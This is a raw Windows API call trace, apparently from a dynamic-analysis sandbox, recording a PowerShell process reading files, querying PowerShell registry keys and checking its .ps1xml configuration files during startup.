	[0140.803] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.803] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.804] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.807] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.807] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.807] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.808] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.808] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.808] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.808] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.809] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1000, lpOverlapped=0x0) returned 1
	[0140.809] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x1b4, lpOverlapped=0x0) returned 1
	[0140.809] ReadFile (in: hFile=0x348, lpBuffer=0x2c849e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd288, lpOverlapped=0x0 | out: lpBuffer=0x2c849e8*, lpNumberOfBytesRead=0x1cd288*=0x0, lpOverlapped=0x0) returned 1
	[0140.809] CloseHandle (hObject=0x348) returned 1
	[0140.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.810] SetErrorMode (uMode=0x1) returned 0x1
	[0140.810] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd200 | out: lpFileInformation=0x1cd200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0140.810] SetErrorMode (uMode=0x1) returned 0x1
	[0140.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.810] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2e8 | out: phkResult=0x1cd2e8*=0x348) returned 0x0
	[0140.810] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd26c, lpData=0x0, lpcbData=0x1cd268*=0x0 | out: lpType=0x1cd26c*=0x1, lpData=0x0, lpcbData=0x1cd268*=0x56) returned 0x0
	[0140.810] CoTaskMemAlloc (cb=0x5a) returned 0x25f470
	[0140.810] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd23c, lpData=0x25f470, lpcbData=0x1cd238*=0x56 | out: lpType=0x1cd23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd238*=0x56) returned 0x0
	[0140.810] CoTaskMemFree (pv=0x25f470) 
	[0140.810] RegCloseKey (hKey=0x348) returned 0x0
	[0140.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0140.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0141.636] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.651] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.652] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.653] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.653] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.653] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.654] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.656] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.669] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.670] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.672] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.673] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.674] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.675] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.774] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.774] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.784] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.793] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.793] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.794] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.795] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.795] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.796] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.796] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.796] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.797] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.797] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.798] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.798] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.798] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.802] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.805] VirtualQuery (in: lpAddress=0x1cbfe0, lpBuffer=0x1ccea0, dwLength=0x30 | out: lpBuffer=0x1ccea0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.805] VirtualQuery (in: lpAddress=0x1cbfe0, lpBuffer=0x1ccea0, dwLength=0x30 | out: lpBuffer=0x1ccea0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.806] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.807] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.950] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.951] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0141.952] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.076] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0142.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.076] CoTaskMemFree (pv=0x23f020) 
	[0142.085] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.092] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.092] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.092] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.093] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.094] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.094] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.096] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.097] VirtualQuery (in: lpAddress=0x1cbfd0, lpBuffer=0x1cce90, dwLength=0x30 | out: lpBuffer=0x1cce90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.098] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd488 | out: phkResult=0x1cd488*=0x31c) returned 0x0
	[0142.098] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1cd49c, lpData=0x0, lpcbData=0x1cd498*=0x0 | out: lpType=0x1cd49c*=0x1, lpData=0x0, lpcbData=0x1cd498*=0x74) returned 0x0
	[0142.098] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1cd40c, lpData=0x0, lpcbData=0x1cd408*=0x0 | out: lpType=0x1cd40c*=0x1, lpData=0x0, lpcbData=0x1cd408*=0x74) returned 0x0
	[0142.098] CoTaskMemAlloc (cb=0x78) returned 0x27d180
	[0142.098] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1cd3dc, lpData=0x27d180, lpcbData=0x1cd3d8*=0x74 | out: lpType=0x1cd3dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd3d8*=0x74) returned 0x0
	[0142.099] CoTaskMemFree (pv=0x27d180) 
	[0142.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0142.099] SetErrorMode (uMode=0x1) returned 0x1
	[0142.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0142.099] SetErrorMode (uMode=0x1) returned 0x1
	[0142.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.101] SetErrorMode (uMode=0x1) returned 0x1
	[0142.101] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0142.101] SetErrorMode (uMode=0x1) returned 0x1
	[0142.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.102] SetErrorMode (uMode=0x1) returned 0x1
	[0142.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0142.102] SetErrorMode (uMode=0x1) returned 0x1
	[0142.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.102] SetErrorMode (uMode=0x1) returned 0x1
	[0142.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd360 | out: lpFileInformation=0x1cd360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0142.102] SetErrorMode (uMode=0x1) returned 0x1
